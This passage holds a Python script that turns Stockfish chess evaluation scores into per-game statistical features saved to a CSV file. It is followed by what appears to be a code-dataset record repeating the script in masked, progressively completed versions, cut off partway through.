white_q4_min.append(min(white_improve[(len(white_improve)//4)*3 : ]))
black_q1_min.append(min(black_improve[0:1+len(black_improve)//4]))
black_q2_min.append(min(black_improve[len(black_improve)//4 : 1+(len(black_improve)//4)*2]))
black_q3_min.append(min(black_improve[(len(black_improve)//4)*2 : 1+(len(black_improve)//4)*3]))
black_q4_min.append(min(black_improve[(len(black_improve)//4)*3 : ]))
white_q1_stdev.append(np.std(np.array((white_improve[0:len(white_improve)//4]))))
white_q2_stdev.append(np.std(np.array((white_improve[len(white_improve)//4 : (len(white_improve)//4)*2]))))
white_q3_stdev.append(np.std(np.array((white_improve[(len(white_improve)//4)*2 : (len(white_improve)//4)*3]))))
white_q4_stdev.append(np.std(np.array((white_improve[(len(white_improve)//4)*3 : ]))))
black_q1_stdev.append(np.std(np.array((black_improve[0:len(black_improve)//4]))))
black_q2_stdev.append(np.std(np.array((black_improve[len(black_improve)//4 : (len(black_improve)//4)*2]))))
black_q3_stdev.append(np.std(np.array((black_improve[(len(black_improve)//4)*2 : (len(black_improve)//4)*3]))))
black_q4_stdev.append(np.std(np.array((black_improve[(len(black_improve)//4)*3 : ]))))
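    #Average score change over each successive 5-move window; fall back to the player's overall average when the game is too short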
if len(white_improve) >=5:
white_5_improve.append( sum(white_improve[0:5])/5 )
else:
white_5_improve.append(white_avg)
if len(white_improve) >=10:
white_10_improve.append( sum(white_improve[5:10])/5 )
else:
white_10_improve.append(white_avg)
if len(white_improve) >=15:
white_15_improve.append( sum(white_improve[10:15])/5 )
else:
white_15_improve.append(white_avg)
if len(white_improve) >=20:
white_20_improve.append( sum(white_improve[15:20])/5 )
else:
white_20_improve.append(white_avg)
if len(white_improve) >=25:
white_25_improve.append( sum(white_improve[20:25])/5 )
else:
white_25_improve.append(white_avg)
if len(white_improve) >=30:
white_30_improve.append( sum(white_improve[25:30])/5 )
else:
white_30_improve.append(white_avg)
if len(white_improve) >=35:
white_35_improve.append( sum(white_improve[30:35])/5 )
else:
white_35_improve.append(white_avg)
if len(white_improve) >=40:
white_40_improve.append( sum(white_improve[35:40])/5 )
else:
white_40_improve.append(white_avg)
if len(white_improve) >=45:
white_45_improve.append( sum(white_improve[40:45])/5 )
else:
white_45_improve.append(white_avg)
if len(white_improve) >=50:
white_50_improve.append( sum(white_improve[45:50])/5 )
else:
white_50_improve.append(white_avg)
if len(white_improve) >=55:
white_55_improve.append( sum(white_improve[50:55])/5 )
else:
white_55_improve.append(white_avg)
if len(white_improve) >=60:
white_60_improve.append( sum(white_improve[55:60])/5 )
else:
white_60_improve.append(white_avg)
if len(white_improve) >=65:
white_65_improve.append( sum(white_improve[60:65])/5 )
else:
white_65_improve.append(white_avg)
if len(white_improve) >=70:
white_70_improve.append( sum(white_improve[65:70])/5 )
else:
white_70_improve.append(white_avg)
if len(white_improve) >=75:
white_75_improve.append( sum(white_improve[70:75])/5 )
else:
white_75_improve.append(white_avg)
if len(black_improve) >=5:
black_5_improve.append( sum(black_improve[0:5])/5 )
else:
black_5_improve.append(black_avg)
if len(black_improve) >=10:
black_10_improve.append( sum(black_improve[5:10])/5 )
else:
black_10_improve.append(black_avg)
if len(black_improve) >=15:
black_15_improve.append( sum(black_improve[10:15])/5 )
else:
black_15_improve.append(black_avg)
if len(black_improve) >=20:
black_20_improve.append( sum(black_improve[15:20])/5 )
else:
black_20_improve.append(black_avg)
if len(black_improve) >=25:
black_25_improve.append( sum(black_improve[20:25])/5 )
else:
black_25_improve.append(black_avg)
if len(black_improve) >=30:
black_30_improve.append( sum(black_improve[25:30])/5 )
else:
black_30_improve.append(black_avg)
if len(black_improve) >=35:
black_35_improve.append( sum(black_improve[30:35])/5 )
else:
black_35_improve.append(black_avg)
if len(black_improve) >=40:
black_40_improve.append( sum(black_improve[35:40])/5 )
else:
black_40_improve.append(black_avg)
if len(black_improve) >=45:
black_45_improve.append( sum(black_improve[40:45])/5 )
else:
black_45_improve.append(black_avg)
if len(black_improve) >=50:
black_50_improve.append( sum(black_improve[45:50])/5 )
else:
black_50_improve.append(black_avg)
if len(black_improve) >=55:
black_55_improve.append( sum(black_improve[50:55])/5 )
else:
black_55_improve.append(black_avg)
if len(black_improve) >=60:
black_60_improve.append( sum(black_improve[55:60])/5 )
else:
black_60_improve.append(black_avg)
if len(black_improve) >=65:
black_65_improve.append( sum(black_improve[60:65])/5 )
else:
black_65_improve.append(black_avg)
if len(black_improve) >=70:
black_70_improve.append( sum(black_improve[65:70])/5 )
else:
black_70_improve.append(black_avg)
if len(black_improve) >=75:
black_75_improve.append( sum(black_improve[70:75])/5 )
else:
black_75_improve.append(black_avg)
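    #Raw evaluation sampled every 10 plies; 0 when the game ended before that ply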
if len(game_nums)>10:
game_score10.append(game_nums[10])
else:
game_score10.append(0)
if len(game_nums)>20:
game_score20.append(game_nums[20])
else:
game_score20.append(0)
if len(game_nums)>30:
game_score30.append(game_nums[30])
else:
game_score30.append(0)
if len(game_nums)>40:
game_score40.append(game_nums[40])
else:
game_score40.append(0)
if len(game_nums)>50:
game_score50.append(game_nums[50])
else:
game_score50.append(0)
if len(game_nums)>60:
game_score60.append(game_nums[60])
else:
game_score60.append(0)
if len(game_nums)>70:
game_score70.append(game_nums[70])
else:
game_score70.append(0)
if len(game_nums)>80:
game_score80.append(game_nums[80])
else:
game_score80.append(0)
if len(game_nums)>90:
game_score90.append(game_nums[90])
else:
game_score90.append(0)
if len(game_nums)>100:
game_score100.append(game_nums[100])
else:
game_score100.append(0)
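    #Final recorded evaluation (0 if the game had no scores)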
if prev:
ending_score.append(prev)
else:
ending_score.append(0)
chess_dict = {"game_length":game_length,"average_score":average_score,"score_stdev":score_stdev,"largest_gain":largest_gain,
"largest_drop":largest_drop,"max_score":max_score,"min_score":min_score,
"ending_score":ending_score, "white_avg_improve":white_avg_improve,
"black_avg_improve":black_avg_improve,"white_median_improve":white_median_improve,
"black_median_improve":black_median_improve,"white_q1_improve":white_q1_improve,
"white_q2_improve":white_q2_improve,
"white_q3_improve":white_q3_improve,
"white_q4_improve":white_q4_improve,"black_q1_improve":black_q1_improve,
"black_q2_improve":black_q2_improve,
"black_q3_improve":black_q3_improve,
"black_q4_improve":black_q4_improve,
'white_5_improve': white_5_improve,
'white_10_improve': white_10_improve,
'white_15_improve': white_15_improve,
'white_20_improve': white_20_improve,
'white_25_improve': white_25_improve,
'white_30_improve': white_30_improve,
'white_35_improve': white_35_improve,
'white_40_improve': white_40_improve,
'white_45_improve': white_45_improve,
'white_50_improve': white_50_improve,
'white_55_improve': white_55_improve,
'white_60_improve': white_60_improve,
'white_65_improve': white_65_improve,
'white_70_improve': white_70_improve,
'white_75_improve': white_75_improve,
'black_5_improve': black_5_improve,
'black_10_improve': black_10_improve,
'black_15_improve': black_15_improve,
'black_20_improve': black_20_improve,
'black_25_improve': black_25_improve,
'black_30_improve': black_30_improve,
'black_35_improve': black_35_improve,
'black_40_improve': black_40_improve,
'black_45_improve': black_45_improve,
'black_50_improve': black_50_improve,
'black_55_improve': black_55_improve,
'black_60_improve': black_60_improve,
'black_65_improve': black_65_improve,
'black_70_improve': black_70_improve,
'black_75_improve': black_75_improve,
'white_q1_max': white_q1_max,
'white_q2_max': white_q2_max,
'white_q3_max': white_q3_max,
'white_q4_max': white_q4_max,
'black_q1_max': black_q1_max,
'black_q2_max': black_q2_max,
'black_q3_max': black_q3_max,
'black_q4_max': black_q4_max,
'white_q1_min': white_q1_min,
'white_q2_min': white_q2_min,
'white_q3_min': white_q3_min,
'white_q4_min': white_q4_min,
'black_q1_min': black_q1_min,
'black_q2_min': black_q2_min,
'black_q3_min': black_q3_min,
'black_q4_min': black_q4_min,
'white_q1_stdev': white_q1_stdev,
'white_q2_stdev': white_q2_stdev,
'white_q3_stdev': white_q3_stdev,
'white_q4_stdev': white_q4_stdev,
'black_q1_stdev': black_q1_stdev,
'black_q2_stdev': black_q2_stdev,
'black_q3_stdev': black_q3_stdev,
'black_q4_stdev': black_q4_stdev,
'game_score10':game_score10,
'game_score20':game_score20,
'game_score30':game_score30,
'game_score40':game_score40,
'game_score50':game_score50,
'game_score60':game_score60,
'game_score70':game_score70,
'game_score80':game_score80,
'game_score90':game_score90,
'game_score100':game_score100
}
#Create feature data frame
chess_df = pd.DataFrame(chess_dict, index=[x for x in range(1,50001)])
chess_df.index.name = "Event"
#Write the new feature data frame to CSV
chess_df.to_csv("score_features.csv")
|
normal
|
{
"blob_id": "ad9bb34fdb05ab885f4871693729449f3618603a",
"index": 8321,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor game in raw_scores:\n game_len = len(game) + 1\n total = 0\n prev = None\n player = 1\n max_so_far = -100\n min_so_far = 100\n max_drop = 0\n max_gain = 0\n white_improve = [0]\n black_improve = [0]\n game_nums = [0]\n for score in game:\n if score != 'NA':\n score = int(score)\n game_nums.append(score)\n total += score\n if prev != None:\n change = score - prev\n if change < max_drop:\n max_drop = change\n if change > max_gain:\n max_gain = change\n if player == 1:\n black_improve.append(change)\n else:\n white_improve.append(change)\n player = abs(player - 1)\n prev = score\n if score > max_so_far:\n max_so_far = score\n if score < min_so_far:\n min_so_far = score\n white_avg = sum(white_improve) / (game_len / 2)\n black_avg = sum(black_improve) / (game_len / 2)\n game_length.append(game_len)\n average_score.append(total / game_len)\n score_stdev.append(np.std(np.array(game_nums)))\n largest_gain.append(max_gain)\n largest_drop.append(max_drop)\n max_score.append(max_so_far)\n min_score.append(min_so_far)\n white_avg_improve.append(white_avg)\n black_avg_improve.append(black_avg)\n white_median_improve.append(sorted(white_improve)[len(white_improve) // 2])\n black_median_improve.append(sorted(black_improve)[len(black_improve) // 2])\n white_q1_improve.append(sum(white_improve[0:len(white_improve) // 4]) /\n len(white_improve) // 4)\n white_q2_improve.append(sum(white_improve[len(white_improve) // 4:len(\n white_improve) // 4 * 2]) / len(white_improve) // 4)\n white_q3_improve.append(sum(white_improve[len(white_improve) // 4 * 2:\n len(white_improve) // 4 * 3]) / len(white_improve) // 4)\n white_q4_improve.append(sum(white_improve[len(white_improve) // 4 * 3:]\n ) / len(white_improve) // 4)\n black_q1_improve.append(sum(black_improve[0:len(black_improve) // 4]) /\n len(black_improve) // 4)\n black_q2_improve.append(sum(black_improve[len(black_improve) // 4:len(\n black_improve) // 4 * 2]) / len(black_improve) // 4)\n black_q3_improve.append(sum(black_improve[len(black_improve) // 4 * 2:\n len(black_improve) // 4 * 3]) / len(black_improve) // 4)\n black_q4_improve.append(sum(black_improve[len(black_improve) // 4 * 3:]\n ) / len(black_improve) // 4)\n white_q1_max.append(max(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_max.append(max(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_max.append(max(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_max.append(max(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_max.append(max(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_max.append(max(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_max.append(max(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_max.append(max(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_min.append(min(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_min.append(min(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_min.append(min(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_min.append(min(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_min.append(min(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_min.append(min(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_min.append(min(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 
3]))\n black_q4_min.append(min(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_stdev.append(np.std(np.array(white_improve[0:len(white_improve\n ) // 4])))\n white_q2_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4:len(white_improve) // 4 * 2])))\n white_q3_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 2:len(white_improve) // 4 * 3])))\n white_q4_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 3:])))\n black_q1_stdev.append(np.std(np.array(black_improve[0:len(black_improve\n ) // 4])))\n black_q2_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4:len(black_improve) // 4 * 2])))\n black_q3_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 2:len(black_improve) // 4 * 3])))\n black_q4_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 3:])))\n if len(white_improve) >= 5:\n white_5_improve.append(sum(white_improve[0:5]) / 5)\n else:\n white_5_improve.append(white_avg)\n if len(white_improve) >= 10:\n white_10_improve.append(sum(white_improve[5:10]) / 5)\n else:\n white_10_improve.append(white_avg)\n if len(white_improve) >= 15:\n white_15_improve.append(sum(white_improve[10:15]) / 5)\n else:\n white_15_improve.append(white_avg)\n if len(white_improve) >= 20:\n white_20_improve.append(sum(white_improve[15:20]) / 5)\n else:\n white_20_improve.append(white_avg)\n if len(white_improve) >= 25:\n white_25_improve.append(sum(white_improve[20:25]) / 5)\n else:\n white_25_improve.append(white_avg)\n if len(white_improve) >= 30:\n white_30_improve.append(sum(white_improve[25:30]) / 5)\n else:\n white_30_improve.append(white_avg)\n if len(white_improve) >= 35:\n white_35_improve.append(sum(white_improve[30:35]) / 5)\n else:\n white_35_improve.append(white_avg)\n if len(white_improve) >= 40:\n white_40_improve.append(sum(white_improve[35:40]) / 5)\n else:\n white_40_improve.append(white_avg)\n if len(white_improve) >= 45:\n white_45_improve.append(sum(white_improve[40:45]) / 5)\n else:\n white_45_improve.append(white_avg)\n if len(white_improve) >= 50:\n white_50_improve.append(sum(white_improve[45:50]) / 5)\n else:\n white_50_improve.append(white_avg)\n if len(white_improve) >= 55:\n white_55_improve.append(sum(white_improve[50:55]) / 5)\n else:\n white_55_improve.append(white_avg)\n if len(white_improve) >= 60:\n white_60_improve.append(sum(white_improve[55:60]) / 5)\n else:\n white_60_improve.append(white_avg)\n if len(white_improve) >= 65:\n white_65_improve.append(sum(white_improve[60:65]) / 5)\n else:\n white_65_improve.append(white_avg)\n if len(white_improve) >= 70:\n white_70_improve.append(sum(white_improve[65:70]) / 5)\n else:\n white_70_improve.append(white_avg)\n if len(white_improve) >= 75:\n white_75_improve.append(sum(white_improve[70:75]) / 5)\n else:\n white_75_improve.append(white_avg)\n if len(black_improve) >= 5:\n black_5_improve.append(sum(black_improve[0:5]) / 5)\n else:\n black_5_improve.append(black_avg)\n if len(black_improve) >= 10:\n black_10_improve.append(sum(black_improve[5:10]) / 5)\n else:\n black_10_improve.append(black_avg)\n if len(black_improve) >= 15:\n black_15_improve.append(sum(black_improve[10:15]) / 5)\n else:\n black_15_improve.append(black_avg)\n if len(black_improve) >= 20:\n black_20_improve.append(sum(black_improve[15:20]) / 5)\n else:\n black_20_improve.append(black_avg)\n if len(black_improve) >= 25:\n black_25_improve.append(sum(black_improve[20:25]) / 5)\n else:\n black_25_improve.append(black_avg)\n if 
len(black_improve) >= 30:\n black_30_improve.append(sum(black_improve[25:30]) / 5)\n else:\n black_30_improve.append(black_avg)\n if len(black_improve) >= 35:\n black_35_improve.append(sum(black_improve[30:35]) / 5)\n else:\n black_35_improve.append(black_avg)\n if len(black_improve) >= 40:\n black_40_improve.append(sum(black_improve[35:40]) / 5)\n else:\n black_40_improve.append(black_avg)\n if len(black_improve) >= 45:\n black_45_improve.append(sum(black_improve[40:45]) / 5)\n else:\n black_45_improve.append(black_avg)\n if len(black_improve) >= 50:\n black_50_improve.append(sum(black_improve[45:50]) / 5)\n else:\n black_50_improve.append(black_avg)\n if len(black_improve) >= 55:\n black_55_improve.append(sum(black_improve[50:55]) / 5)\n else:\n black_55_improve.append(black_avg)\n if len(black_improve) >= 60:\n black_60_improve.append(sum(black_improve[55:60]) / 5)\n else:\n black_60_improve.append(black_avg)\n if len(black_improve) >= 65:\n black_65_improve.append(sum(black_improve[60:65]) / 5)\n else:\n black_65_improve.append(black_avg)\n if len(black_improve) >= 70:\n black_70_improve.append(sum(black_improve[65:70]) / 5)\n else:\n black_70_improve.append(black_avg)\n if len(black_improve) >= 75:\n black_75_improve.append(sum(black_improve[70:75]) / 5)\n else:\n black_75_improve.append(black_avg)\n if len(game_nums) > 10:\n game_score10.append(game_nums[10])\n else:\n game_score10.append(0)\n if len(game_nums) > 20:\n game_score20.append(game_nums[20])\n else:\n game_score20.append(0)\n if len(game_nums) > 30:\n game_score30.append(game_nums[30])\n else:\n game_score30.append(0)\n if len(game_nums) > 40:\n game_score40.append(game_nums[40])\n else:\n game_score40.append(0)\n if len(game_nums) > 50:\n game_score50.append(game_nums[50])\n else:\n game_score50.append(0)\n if len(game_nums) > 60:\n game_score60.append(game_nums[60])\n else:\n game_score60.append(0)\n if len(game_nums) > 70:\n game_score70.append(game_nums[70])\n else:\n game_score70.append(0)\n if len(game_nums) > 80:\n game_score80.append(game_nums[80])\n else:\n game_score80.append(0)\n if len(game_nums) > 90:\n game_score90.append(game_nums[90])\n else:\n game_score90.append(0)\n if len(game_nums) > 100:\n game_score100.append(game_nums[100])\n else:\n game_score100.append(0)\n if prev:\n ending_score.append(prev)\n else:\n ending_score.append(0)\n<mask token>\nchess_df.to_csv('score_features.csv')\n",
"step-3": "<mask token>\nraw_scores = [line.strip().split(',')[1].split() for line in open(\n 'stockfish.csv')][1:]\ngame_length = []\naverage_score = []\nscore_stdev = []\nlargest_gain = []\nlargest_drop = []\nmax_score = []\nmin_score = []\nending_score = []\nwhite_avg_improve = []\nblack_avg_improve = []\nwhite_median_improve = []\nblack_median_improve = []\nwhite_q1_improve = []\nwhite_q2_improve = []\nwhite_q3_improve = []\nwhite_q4_improve = []\nblack_q1_improve = []\nblack_q2_improve = []\nblack_q3_improve = []\nblack_q4_improve = []\ngame_score10 = []\ngame_score20 = []\ngame_score30 = []\ngame_score40 = []\ngame_score50 = []\ngame_score60 = []\ngame_score70 = []\ngame_score80 = []\ngame_score90 = []\ngame_score100 = []\nwhite_q1_max = []\nwhite_q2_max = []\nwhite_q3_max = []\nwhite_q4_max = []\nblack_q1_max = []\nblack_q2_max = []\nblack_q3_max = []\nblack_q4_max = []\nwhite_q1_min = []\nwhite_q2_min = []\nwhite_q3_min = []\nwhite_q4_min = []\nblack_q1_min = []\nblack_q2_min = []\nblack_q3_min = []\nblack_q4_min = []\nwhite_q1_stdev = []\nwhite_q2_stdev = []\nwhite_q3_stdev = []\nwhite_q4_stdev = []\nblack_q1_stdev = []\nblack_q2_stdev = []\nblack_q3_stdev = []\nblack_q4_stdev = []\nwhite_5_improve = []\nwhite_10_improve = []\nwhite_15_improve = []\nwhite_20_improve = []\nwhite_25_improve = []\nwhite_30_improve = []\nwhite_35_improve = []\nwhite_40_improve = []\nwhite_45_improve = []\nwhite_50_improve = []\nwhite_55_improve = []\nwhite_60_improve = []\nwhite_65_improve = []\nwhite_70_improve = []\nwhite_75_improve = []\nblack_5_improve = []\nblack_10_improve = []\nblack_15_improve = []\nblack_20_improve = []\nblack_25_improve = []\nblack_30_improve = []\nblack_35_improve = []\nblack_40_improve = []\nblack_45_improve = []\nblack_50_improve = []\nblack_55_improve = []\nblack_60_improve = []\nblack_65_improve = []\nblack_70_improve = []\nblack_75_improve = []\nfor game in raw_scores:\n game_len = len(game) + 1\n total = 0\n prev = None\n player = 1\n max_so_far = -100\n min_so_far = 100\n max_drop = 0\n max_gain = 0\n white_improve = [0]\n black_improve = [0]\n game_nums = [0]\n for score in game:\n if score != 'NA':\n score = int(score)\n game_nums.append(score)\n total += score\n if prev != None:\n change = score - prev\n if change < max_drop:\n max_drop = change\n if change > max_gain:\n max_gain = change\n if player == 1:\n black_improve.append(change)\n else:\n white_improve.append(change)\n player = abs(player - 1)\n prev = score\n if score > max_so_far:\n max_so_far = score\n if score < min_so_far:\n min_so_far = score\n white_avg = sum(white_improve) / (game_len / 2)\n black_avg = sum(black_improve) / (game_len / 2)\n game_length.append(game_len)\n average_score.append(total / game_len)\n score_stdev.append(np.std(np.array(game_nums)))\n largest_gain.append(max_gain)\n largest_drop.append(max_drop)\n max_score.append(max_so_far)\n min_score.append(min_so_far)\n white_avg_improve.append(white_avg)\n black_avg_improve.append(black_avg)\n white_median_improve.append(sorted(white_improve)[len(white_improve) // 2])\n black_median_improve.append(sorted(black_improve)[len(black_improve) // 2])\n white_q1_improve.append(sum(white_improve[0:len(white_improve) // 4]) /\n len(white_improve) // 4)\n white_q2_improve.append(sum(white_improve[len(white_improve) // 4:len(\n white_improve) // 4 * 2]) / len(white_improve) // 4)\n white_q3_improve.append(sum(white_improve[len(white_improve) // 4 * 2:\n len(white_improve) // 4 * 3]) / len(white_improve) // 4)\n 
white_q4_improve.append(sum(white_improve[len(white_improve) // 4 * 3:]\n ) / len(white_improve) // 4)\n black_q1_improve.append(sum(black_improve[0:len(black_improve) // 4]) /\n len(black_improve) // 4)\n black_q2_improve.append(sum(black_improve[len(black_improve) // 4:len(\n black_improve) // 4 * 2]) / len(black_improve) // 4)\n black_q3_improve.append(sum(black_improve[len(black_improve) // 4 * 2:\n len(black_improve) // 4 * 3]) / len(black_improve) // 4)\n black_q4_improve.append(sum(black_improve[len(black_improve) // 4 * 3:]\n ) / len(black_improve) // 4)\n white_q1_max.append(max(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_max.append(max(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_max.append(max(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_max.append(max(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_max.append(max(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_max.append(max(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_max.append(max(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_max.append(max(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_min.append(min(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_min.append(min(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_min.append(min(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_min.append(min(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_min.append(min(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_min.append(min(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_min.append(min(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_min.append(min(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_stdev.append(np.std(np.array(white_improve[0:len(white_improve\n ) // 4])))\n white_q2_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4:len(white_improve) // 4 * 2])))\n white_q3_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 2:len(white_improve) // 4 * 3])))\n white_q4_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 3:])))\n black_q1_stdev.append(np.std(np.array(black_improve[0:len(black_improve\n ) // 4])))\n black_q2_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4:len(black_improve) // 4 * 2])))\n black_q3_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 2:len(black_improve) // 4 * 3])))\n black_q4_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 3:])))\n if len(white_improve) >= 5:\n white_5_improve.append(sum(white_improve[0:5]) / 5)\n else:\n white_5_improve.append(white_avg)\n if len(white_improve) >= 10:\n white_10_improve.append(sum(white_improve[5:10]) / 5)\n else:\n white_10_improve.append(white_avg)\n if len(white_improve) >= 15:\n white_15_improve.append(sum(white_improve[10:15]) / 5)\n else:\n white_15_improve.append(white_avg)\n if len(white_improve) >= 20:\n white_20_improve.append(sum(white_improve[15:20]) / 5)\n else:\n white_20_improve.append(white_avg)\n if len(white_improve) >= 25:\n white_25_improve.append(sum(white_improve[20:25]) / 5)\n else:\n white_25_improve.append(white_avg)\n if len(white_improve) >= 30:\n white_30_improve.append(sum(white_improve[25:30]) / 5)\n else:\n 
white_30_improve.append(white_avg)\n if len(white_improve) >= 35:\n white_35_improve.append(sum(white_improve[30:35]) / 5)\n else:\n white_35_improve.append(white_avg)\n if len(white_improve) >= 40:\n white_40_improve.append(sum(white_improve[35:40]) / 5)\n else:\n white_40_improve.append(white_avg)\n if len(white_improve) >= 45:\n white_45_improve.append(sum(white_improve[40:45]) / 5)\n else:\n white_45_improve.append(white_avg)\n if len(white_improve) >= 50:\n white_50_improve.append(sum(white_improve[45:50]) / 5)\n else:\n white_50_improve.append(white_avg)\n if len(white_improve) >= 55:\n white_55_improve.append(sum(white_improve[50:55]) / 5)\n else:\n white_55_improve.append(white_avg)\n if len(white_improve) >= 60:\n white_60_improve.append(sum(white_improve[55:60]) / 5)\n else:\n white_60_improve.append(white_avg)\n if len(white_improve) >= 65:\n white_65_improve.append(sum(white_improve[60:65]) / 5)\n else:\n white_65_improve.append(white_avg)\n if len(white_improve) >= 70:\n white_70_improve.append(sum(white_improve[65:70]) / 5)\n else:\n white_70_improve.append(white_avg)\n if len(white_improve) >= 75:\n white_75_improve.append(sum(white_improve[70:75]) / 5)\n else:\n white_75_improve.append(white_avg)\n if len(black_improve) >= 5:\n black_5_improve.append(sum(black_improve[0:5]) / 5)\n else:\n black_5_improve.append(black_avg)\n if len(black_improve) >= 10:\n black_10_improve.append(sum(black_improve[5:10]) / 5)\n else:\n black_10_improve.append(black_avg)\n if len(black_improve) >= 15:\n black_15_improve.append(sum(black_improve[10:15]) / 5)\n else:\n black_15_improve.append(black_avg)\n if len(black_improve) >= 20:\n black_20_improve.append(sum(black_improve[15:20]) / 5)\n else:\n black_20_improve.append(black_avg)\n if len(black_improve) >= 25:\n black_25_improve.append(sum(black_improve[20:25]) / 5)\n else:\n black_25_improve.append(black_avg)\n if len(black_improve) >= 30:\n black_30_improve.append(sum(black_improve[25:30]) / 5)\n else:\n black_30_improve.append(black_avg)\n if len(black_improve) >= 35:\n black_35_improve.append(sum(black_improve[30:35]) / 5)\n else:\n black_35_improve.append(black_avg)\n if len(black_improve) >= 40:\n black_40_improve.append(sum(black_improve[35:40]) / 5)\n else:\n black_40_improve.append(black_avg)\n if len(black_improve) >= 45:\n black_45_improve.append(sum(black_improve[40:45]) / 5)\n else:\n black_45_improve.append(black_avg)\n if len(black_improve) >= 50:\n black_50_improve.append(sum(black_improve[45:50]) / 5)\n else:\n black_50_improve.append(black_avg)\n if len(black_improve) >= 55:\n black_55_improve.append(sum(black_improve[50:55]) / 5)\n else:\n black_55_improve.append(black_avg)\n if len(black_improve) >= 60:\n black_60_improve.append(sum(black_improve[55:60]) / 5)\n else:\n black_60_improve.append(black_avg)\n if len(black_improve) >= 65:\n black_65_improve.append(sum(black_improve[60:65]) / 5)\n else:\n black_65_improve.append(black_avg)\n if len(black_improve) >= 70:\n black_70_improve.append(sum(black_improve[65:70]) / 5)\n else:\n black_70_improve.append(black_avg)\n if len(black_improve) >= 75:\n black_75_improve.append(sum(black_improve[70:75]) / 5)\n else:\n black_75_improve.append(black_avg)\n if len(game_nums) > 10:\n game_score10.append(game_nums[10])\n else:\n game_score10.append(0)\n if len(game_nums) > 20:\n game_score20.append(game_nums[20])\n else:\n game_score20.append(0)\n if len(game_nums) > 30:\n game_score30.append(game_nums[30])\n else:\n game_score30.append(0)\n if len(game_nums) > 40:\n 
game_score40.append(game_nums[40])\n else:\n game_score40.append(0)\n if len(game_nums) > 50:\n game_score50.append(game_nums[50])\n else:\n game_score50.append(0)\n if len(game_nums) > 60:\n game_score60.append(game_nums[60])\n else:\n game_score60.append(0)\n if len(game_nums) > 70:\n game_score70.append(game_nums[70])\n else:\n game_score70.append(0)\n if len(game_nums) > 80:\n game_score80.append(game_nums[80])\n else:\n game_score80.append(0)\n if len(game_nums) > 90:\n game_score90.append(game_nums[90])\n else:\n game_score90.append(0)\n if len(game_nums) > 100:\n game_score100.append(game_nums[100])\n else:\n game_score100.append(0)\n if prev:\n ending_score.append(prev)\n else:\n ending_score.append(0)\nchess_dict = {'game_length': game_length, 'average_score': average_score,\n 'score_stdev': score_stdev, 'largest_gain': largest_gain,\n 'largest_drop': largest_drop, 'max_score': max_score, 'min_score':\n min_score, 'ending_score': ending_score, 'white_avg_improve':\n white_avg_improve, 'black_avg_improve': black_avg_improve,\n 'white_median_improve': white_median_improve, 'black_median_improve':\n black_median_improve, 'white_q1_improve': white_q1_improve,\n 'white_q2_improve': white_q2_improve, 'white_q3_improve':\n white_q3_improve, 'white_q4_improve': white_q4_improve,\n 'black_q1_improve': black_q1_improve, 'black_q2_improve':\n black_q2_improve, 'black_q3_improve': black_q3_improve,\n 'black_q4_improve': black_q4_improve, 'white_5_improve':\n white_5_improve, 'white_10_improve': white_10_improve,\n 'white_15_improve': white_15_improve, 'white_20_improve':\n white_20_improve, 'white_25_improve': white_25_improve,\n 'white_30_improve': white_30_improve, 'white_35_improve':\n white_35_improve, 'white_40_improve': white_40_improve,\n 'white_45_improve': white_45_improve, 'white_50_improve':\n white_50_improve, 'white_55_improve': white_55_improve,\n 'white_60_improve': white_60_improve, 'white_65_improve':\n white_65_improve, 'white_70_improve': white_70_improve,\n 'white_75_improve': white_75_improve, 'black_5_improve':\n black_5_improve, 'black_10_improve': black_10_improve,\n 'black_15_improve': black_15_improve, 'black_20_improve':\n black_20_improve, 'black_25_improve': black_25_improve,\n 'black_30_improve': black_30_improve, 